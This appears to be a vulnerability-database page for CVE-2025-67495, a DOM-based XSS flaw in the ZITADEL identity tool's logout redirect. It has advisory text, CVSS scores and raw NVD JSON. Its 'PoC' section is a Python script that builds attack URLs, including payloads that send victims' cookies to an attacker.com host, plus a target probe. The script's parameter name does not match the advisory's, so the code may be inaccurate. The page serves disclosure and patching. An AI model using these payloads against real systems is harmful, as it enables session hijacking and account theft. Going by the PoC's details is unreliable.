Security Vulnerability Report
CVE-2025-67495 CVSS 8.0 HIGH

CVE-2025-67495

Published: 2025-12-09 23:16:00
Last Modified: 2025-12-19 18:30:55

Description

ZITADEL is an open-source identity infrastructure tool. Versions 4.0.0-rc.1 through 4.7.0 are vulnerable to DOM-based XSS through the Zitadel V2 logout endpoint. The /logout endpoint insecurely routes to a value supplied in the post_logout_redirect GET parameter. As a result, an unauthenticated remote attacker can execute malicious JS code in Zitadel users’ browsers. To carry out an attack, multiple user sessions need to be active in the same browser; however, account takeover is mitigated when using Multi-Factor Authentication (MFA) or Passwordless authentication. This issue is fixed in version 4.7.1.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
ZITADEL 4.0.0-rc.1
ZITADEL 4.0.0
ZITADEL 4.1.x
ZITADEL 4.2.x
ZITADEL 4.3.x
ZITADEL 4.4.x
ZITADEL 4.5.x
ZITADEL 4.6.x
ZITADEL 4.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67495 PoC - ZITADEL DOM-based XSS via logout endpoint
# Target: ZITADEL instances versions 4.0.0-rc.1 to 4.7.0
import urllib.parse

import requests


def generate_xss_payload():
    """
    Generate various XSS payloads for exploiting the DOM-based XSS in the
    ZITADEL logout endpoint via the post_logout_redirect parameter.
    """
    base_url = "https://vulnerable-zitadel-instance.com/logout"

    # Payload 1: Basic JavaScript execution
    payload1 = "javascript:alert(document.cookie)"

    # Payload 2: Cookie stealing with external endpoint
    # Replace 'attacker.com' with actual attacker-controlled server
    payload2 = "javascript:fetch('https://attacker.com/steal?c='+document.cookie)"

    # Payload 3: Session hijacking via document.domain manipulation
    # (defined but not used in the generated URLs below)
    payload3 = "javascript:var img=new Image();img.src='https://attacker.com/log?'+document.cookie"

    # Payload 4: Using data: protocol
    payload4 = "data:text/html,<script>alert(document.cookie)</script>"

    # Encode payloads
    encoded_payload1 = urllib.parse.quote(payload1)
    encoded_payload2 = urllib.parse.quote(payload2)

    # Generate attack URLs
    urls = {
        "basic_xss": f"{base_url}?post_logout_redirect_uri={encoded_payload1}",
        "cookie_stealing": f"{base_url}?post_logout_redirect_uri={encoded_payload2}",
        "data_protocol": f"{base_url}?post_logout_redirect_uri={urllib.parse.quote(payload4)}",
    }
    return urls


def verify_target(url):
    """
    Verify if target is vulnerable by checking for specific patterns.
    This is a simplified check - full verification requires browser automation.
    """
    try:
        response = requests.get(url, timeout=10, allow_redirects=False)
        # Check if the parameter is reflected in response
        if "post_logout_redirect" in response.text.lower():
            return "Potential vulnerability - parameter reflected in response"
        return "Target may not be vulnerable or not ZITADEL"
    except requests.RequestException as e:
        return f"Error: {str(e)}"


if __name__ == "__main__":
    print("CVE-2025-67495 PoC - ZITADEL DOM-based XSS")
    print("=" * 50)

    payloads = generate_xss_payload()
    for name, url in payloads.items():
        print(f"\n{name.upper()}:")
        print(url)

    print("\n" + "=" * 50)
    print("Note: User interaction required. Victim must have multiple active sessions.")
    print("Mitigation: Upgrade to ZITADEL 4.7.1 or later.")
```

References

Patch: https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96
Vendor Advisory: https://github.com/zitadel/zitadel/security/advisories/GHSA-v959-qxv6-6f8p
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67495",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T23:15:59.933",
    "lastModified": "2025-12-19T18:30:55.107",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ZITADEL is an open-source identity infrastructure tool. Versions 4.0.0-rc.1 through 4.7.0 are vulnerable to DOM-Based XSS through the Zitadel V2 logout endpoint. The /logout endpoint insecurely routes to a value that is supplied in the post_logout_redirect GET parameter. As a result, unauthenticated remote attacker can execute malicious JS code on Zitadel users’ browsers. To carry out an attack, multiple user sessions need to be active in the same browser, however, account takeover is mitigated when using Multi-Factor Authentication (MFA) or Passwordless authentication. This issue is fixed in version 4.7.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.7.1",
                "matchCriteriaId": "E1B051D6-969F-4B70-BF3F-AFD77FB00251"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-v959-qxv6-6f8p",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```